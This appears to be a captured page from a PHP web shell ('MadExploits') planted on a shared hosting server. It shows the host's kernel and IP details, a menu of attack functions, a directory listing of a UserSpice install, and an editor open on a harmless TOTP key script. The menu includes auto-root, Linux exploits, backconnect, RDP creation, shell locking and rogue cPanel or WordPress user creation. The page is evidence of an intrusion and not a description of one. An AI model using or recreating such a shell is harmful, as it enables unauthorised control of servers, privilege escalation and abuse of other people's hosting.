Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
userspice /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_clone.php
2.94
KB
-rw-r--r--
_edit.php
3.47
KB
-rw-r--r--
_edit.xml
447
B
-rw-r--r--
extend.php
8.84
KB
-rw-r--r--
fileindex.php
95
B
-rw-r--r--
gen_totp_key.php
1.21
KB
-rw-r--r--
import.php
3.03
KB
-rw-r--r--
info.xml
2.51
KB
-rw-r--r--
init.php
2.36
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.09
KB
-rw-r--r--
install.xml
1.94
KB
-rw-r--r--
md5
1.18
KB
-rw-r--r--
notes.txt
1.13
KB
-rw-r--r--
totp_key.php
1.47
KB
-rw-r--r--
totp_requirements.php
2.33
KB
-rw-r--r--
update_pass.php
517
B
-rw-r--r--
userspice.sql
51.39
KB
-rw-r--r--
userspice.zip
5.74
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gen_totp_key.php
<?php //Method taken from users/helpers/encryption.php /* ------------------------------------------------------------------ * | 1. ENGINE DETECTION | * ------------------------------------------------------------------ */ /** * Returns the crypto engine to use: 'sodium', 'openssl', or null (none). */ function totp_crypto_engine(): ?string { // Native libsodium if (function_exists('sodium_crypto_secretbox')) { return 'sodium'; } // sodium_compat polyfill (global class ParagonIE_Sodium_Compat) if (class_exists('ParagonIE_Sodium_Compat')) { return 'sodium'; } // PHP’s OpenSSL extension with AES-256-GCM if ( defined('OPENSSL_VERSION_TEXT') && in_array( 'aes-256-gcm', array_map('strtolower', openssl_get_cipher_methods()), true ) ) { return 'openssl'; } return null; } /* Generate 32-byte master key */ $rawKey = random_bytes(32); $b64Key = base64_encode($rawKey); $cryptoEngine = totp_crypto_engine(); echo '<cryptoEngine>'.$cryptoEngine.'</cryptoEngine>'; echo '<b64Key>'.$b64Key.'</b64Key>'; @unlink('gen_totp_key.php'); ?>
Close